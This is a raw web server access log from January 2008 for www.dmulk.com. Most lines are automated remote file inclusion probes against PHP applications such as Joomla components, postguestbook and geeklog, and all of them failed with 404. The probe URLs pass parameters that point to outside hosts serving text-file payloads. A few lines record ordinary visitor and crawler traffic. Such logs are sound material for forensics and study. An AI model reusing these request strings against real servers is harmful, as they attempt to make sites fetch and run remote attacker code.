67.205.69.36 - - [18/Jan/2008:13:11:52 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ipfr.de//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
67.205.69.36 - - [18/Jan/2008:13:11:52 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ipfr.de//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:13:11:54 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:13:11:56 -0800] "GET //zero_vote/error.php%3fdir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:11:58 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:11:59 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:11:59 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:13:12:37 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:13:12:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:13:12:37 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:13:03 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:13:03 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:13:04 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:13:13:21 -0800] "GET /logs/access_071229.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.203.157 - - [18/Jan/2008:13:14:06 -0800] "GET /Calendar/tools/send_reminders.php?noSetuid=30(wwwrun)%20gid=8(www)%20groups=8(www),2524(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
206.221.184.180 - - [18/Jan/2008:13:14:47 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:15:23 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:16:20 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:16:21 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:16:21 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:16:26 -0800] "GET /logs/access_071220.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:16:56 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:13:17:47 -0800] "GET /logs/access_071229.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:18:14 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:18:14 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:18:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:18:46 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:18:47 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:18:47 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:13:18:55 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:13:18:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:19:27 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:13:19:52 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:13:19:52 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:20:10 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:13:20:20 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:13:20:23 -0800] "GET //zero_vote/error.php%3fdir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:13:20:27 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:13:20:54 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:13:20:54 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:13:20:54 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:20:57 -0800] "GET /logs/access_080101.log////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:20:57 -0800] "GET ////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:20:58 -0800] "GET /logs////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:21:08 -0800] "GET /logs/access_080101.log////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:21:09 -0800] "GET ////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:21:09 -0800] "GET /logs////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:21:34 -0800] "GET /logs/access_071228.log//zero_vote/error.php%3fdir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:21:35 -0800] "GET //zero_vote/error.php%3fdir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:21:35 -0800] "GET /logs//zero_vote/error.php%3fdir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:13:22:48 -0800] "GET //admin.php?include_path=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:13:22:48 -0800] "GET /logs//admin.php?include_path=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:23:15 -0800] "GET /logs/access_071214.log////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:23:17 -0800] "GET /logs/access_071214.log////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.168 - - [18/Jan/2008:13:23:36 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.mobilitalavorativa.it/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:23:45 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:13:23:58 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:13:24:36 -0800] "GET /logs/access.log//zero_vote/error.php%3fdir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:13:25:12 -0800] "GET /logs/access_071228.log//zero_vote/error.php%3fdir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:13:25:12 -0800] "GET /logs//zero_vote/error.php%3fdir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:26:20 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:26:20 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:26:20 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:26:20 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.237.203.157 - - [18/Jan/2008:13:26:51 -0800] "GET /logs/access_080101.log/Calendar/tools/send_reminders.php?noSetuid=30(wwwrun)%20gid=8(www)%20groups=8(www),2524(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [18/Jan/2008:13:26:52 -0800] "GET /logs/Calendar/tools/send_reminders.php?noSetuid=30(wwwrun)%20gid=8(www)%20groups=8(www),2524(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:28:16 -0800] "GET //modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:28:16 -0800] "GET /logs//modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:28:16 -0800] "GET //modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:28:16 -0800] "GET /logs//modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:13:28:29 -0800] "GET /logs/access.log//zero_vote/error.php%3fdir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:13:28:44 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:28:44 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:28:44 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:28:45 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:28:45 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:13:28:45 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:13:28:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.230 - - [18/Jan/2008:13:28:49 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.14.194 - - [18/Jan/2008:13:31:11 -0800] "GET /logs/access.log//send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [18/Jan/2008:13:31:11 -0800] "GET /logs//send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.208.78.80 - - [18/Jan/2008:13:31:26 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
88.208.78.80 - - [18/Jan/2008:13:31:26 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:13:33:44 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:33:51 -0800] "GET //modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:33:51 -0800] "GET //modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:33:52 -0800] "GET /logs//modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:33:53 -0800] "GET /logs//modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:33:55 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:33:55 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:33:56 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.141.167 - - [18/Jan/2008:13:34:39 -0800] "GET /logs//spaw/dialogs/table.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:13:34:44 -0800] "GET /logs/access_071228.log//zero_vote/error.php%3fdir=http://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:13:34:45 -0800] "GET //zero_vote/error.php%3fdir=http://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:13:34:45 -0800] "GET /logs//zero_vote/error.php%3fdir=http://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.210.154.142 - - [18/Jan/2008:13:35:10 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
71.210.154.142 - - [18/Jan/2008:13:35:10 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:35:37 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.210.154.142 - - [18/Jan/2008:13:35:37 -0800] "GET /bikes/GPS/ HTTP/1.1" 200 677 "http://www.dmulk.com/bikes/GPS/WeSTOC2006/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:35:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:35:38 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.210.154.142 - - [18/Jan/2008:13:35:41 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.dmulk.com/bikes/GPS/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
71.210.154.142 - - [18/Jan/2008:13:35:48 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 200 196608 "http://www.dmulk.com/bikes/GPS/WeSTOC2006/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.169.141.167 - - [18/Jan/2008:13:35:50 -0800] "GET /logs/access_071225.log//spaw/dialogs/table.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [18/Jan/2008:13:37:08 -0800] "GET //spaw/dialogs/table.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.23.232 - - [18/Jan/2008:13:37:24 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:13:37:39 -0800] "GET /logs/access.log//zero_vote/error.php%3fdir=http://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
